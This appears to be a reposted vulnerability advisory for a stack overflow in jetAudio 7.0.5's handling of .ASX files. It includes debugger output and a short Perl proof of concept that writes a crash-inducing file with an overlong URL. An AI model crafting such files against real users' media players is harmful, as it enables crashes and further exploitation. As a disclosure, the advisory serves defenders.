jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow

Advisory Content :

Application: jetAudio 7.0.5 (.ASX) Remote Stack Overflow

Web Site: http://www.cowonamerica.com/download/

Platform: Windows

Bug:Remote Stack Overflow

Extension: ASX

special condition: none

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Credits

===========

1) Introduction

===========

A nice introduction to jetaudio can be found :
http://www.cowonamerica.com/products/jetaudio/

======

2) Bug

======

When parsing an asx file with a long URL a stack overflow occurs.

=====

3)Proof of concept

=====

Proof of concept example :

An url with 1096 A ( http://AAAAA....) will overwritte ESI and crash the
program

Here's the debugger output:

Access violation - code c0000005

eax=00000000 ebx=01187684 ecx=00000459 edx=0012d39c esi=41414141
edi=00000001

eip=00441dad esp=0012cf3c ebp=00000001 iopl=0 nv up ei pl nz na po
nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206

JetAudio!CxImage::`copy constructor closure'+0x1109d:

00441dad 8b06 mov eax,[esi]
ds:0023:41414141=????????

Here's the the Poc :

#!/usr/local/bin/perl

use strict;

use warnings;

my $file="myfile.asx";

my $payload = "A" x 1096;

open( $FILE, ">>$file") or die "Cannot open $file: $!";

print $FILE "http://".$payload;

close($FILE);

print "$file has been created n";

=====

5)Credits

=====

laurent gaffié

laurent.gaffie{remove_this}[at]gmail[dot]com

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow